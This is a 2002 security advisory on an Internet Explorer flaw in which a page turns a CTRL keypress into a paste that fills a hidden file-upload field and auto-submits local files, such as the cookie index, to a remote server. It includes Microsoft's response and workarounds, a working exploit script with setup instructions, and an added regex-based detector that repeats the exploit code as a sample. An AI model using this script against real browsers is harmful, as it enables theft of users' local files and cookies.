
Pressing CTRL in IE is dangerous

by Nikola Strahija on July 24th, 2002. Pressing CTRL in IE may result in an arbitrary local file being uploaded to a remote server (no exact path needed). If sensitive information is uploaded, it may be used to go on and run programs remotely.


Microsoft sent the following statement:
"After investigation, our product team has confirmed that this does not meet the bar of a security vulnerability. We will not be releasing a hotfix or patch for this issue."

They proposed the following possible workarounds:
1. disable, or set to prompt, the "Submit nonencrypted form data" option
2. disable "Allow paste operations via script" (best)
3. disable Active Scripting

DESCRIPTION:
============

A specially crafted webpage can retrieve any local file using simple JavaScript. This is possible by performing the following steps:

1. When a user presses the CTRL key, an onkeydown handler can be set to fire. In the handler the pressed key is changed to 'V' (keyCode 86). The result is a paste operation that is subject to fewer restrictions than a paste initiated by script.

2. The content of the clipboard is altered and focus is moved to a hidden file upload form. The paste is performed into the form, changing the value of the file upload field (something a script is not normally allowed to do).

3. The upload form is submitted automatically (a legitimate JavaScript operation).

It isn't necessary to know the exact path to local files because it's possible to refer to a file with "..\filename".

Further on, if the local file "..\LOCALS~1\TEMPOR~1\CONTENT.IE5\index.dat" is uploaded, the randomly named directories needed to build the exact path to the Temporary Internet Files folder can be read from it. Knowing the exact path, a compiled help file (.chm) can be dumped there and launched with showHelp() (the old .chm attack). A compiled help file is allowed to contain instructions to execute arbitrary programs.


EXPLOIT:
========

Instructions:
Put the HTML code in a remote HTML document and load it with Internet Explorer. Activate the exploit by pressing CTRL. You must prepare a server-side script to handle the upload ("upload.php"). If you choose PHP, I recommend http://www.php.net/manual/en/features.file-upload.php as a reference on how to set up a server-side script that handles a file upload.

Note:
1. Please remove all "!" characters in the exploit code. They have been inserted to reduce false virus alarms triggered by this mail.
2. Default settings are assumed.

Exploit:
-------------------------- CUT HERE -------------------------------

// The hidden <div> and the <form name="u"> markup that wrap this script did not
// survive in this copy. The script expects a form named "u", with a file input
// named "file", posting (multipart) to the "upload.php" handler mentioned above.

// Local file to upload; the path is relative, so no drive letter or user name is needed.
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
  // Only react to the CTRL key, and only once.
  if (!event.ctrlKey) return;
  document.onkeydown = null;
  // Rewrite the key event to 'V' so IE performs a user-style paste.
  event.keyCode = 86;
  // Put the wanted file name on the clipboard and give focus to the file field,
  // so the paste lands in a control that script may not set directly.
  window.clipboardData.setData("Text",uploadFile);
  (p=document.forms.u.file).focus();
  // As soon as the field's value changes, submit the form.
  p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};

-------------------------- CUT HERE -------------------------------
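As an added example (not part of the original advisory), the script below is a static heuristic that flags page scripts combining the ingredients described in the DESCRIPTION section and present in the exploit above: a keydown hook, event.keyCode forced to 86 ('V'), a scripted clipboard write, a focused file-upload field and an auto-submit. The indicator names, the scoring rule and the two sample inputs are assumptions constructed for this example.

```javascript
// Added example: static indicators for the CTRL-to-paste file upload trick.
// Indicator names and the scoring rule below are assumptions for this example.
const INDICATORS = {
  keydownHook:    /\bon(?:keydown|keypress)\s*=/i,            // key event hijack
  keyRewrite:     /\bevent\.keyCode\s*=\s*86\b/,              // key forced to 'V'
  clipboardWrite: /\bclipboardData\.setData\s*\(/,            // scripted clipboard write
  fileFieldFocus: /\.(?:file|files|upload)\s*\)?\s*\.focus\s*\(/, // file field focused
  autoSubmit:     /onpropertychange\s*=[\s\S]{0,80}\.submit\s*\(/, // submit on value change
};

// Returns the indicators found and whether their combination is suspicious.
// A scripted clipboard write alone (e.g. a "copy link" button) is benign; one
// paired with a key rewrite or a focused/auto-submitted file field is not.
function scanSource(source) {
  const hits = Object.keys(INDICATORS).filter((name) => INDICATORS[name].test(source));
  const suspicious = hits.includes('clipboardWrite') &&
    ['keyRewrite', 'fileFieldFocus', 'autoSubmit'].some((n) => hits.includes(n));
  return { hits, suspicious };
}

// Constructed samples: the first mirrors the advisory's script, the second is
// a harmless clipboard helper that must not be flagged.
const SAMPLE_MALICIOUS = `
uploadFile="..\\\\Cookies\\\\index.dat";
function gotKey(){
  if (!event.ctrlKey) return;
  document.onkeydown = null;
  event.keyCode = 86;
  window.clipboardData.setData("Text",uploadFile);
  (p=document.forms.u.file).focus();
  p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;`;

const SAMPLE_BENIGN = `
function copyLink(){ window.clipboardData.setData("Text", location.href); }
document.getElementById("copy").onclick = copyLink;`;

for (const [label, src] of [['advisory script', SAMPLE_MALICIOUS], ['copy-link helper', SAMPLE_BENIGN]]) {
  const r = scanSource(src);
  console.log(`${label}: suspicious=${r.suspicious} hits=${r.hits.join(',')}`);
}
```

The heuristic only recognises the IE-era clipboardData/onpropertychange idiom; it is a triage aid for proxy logs or saved pages, not a general clipboard-abuse detector.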

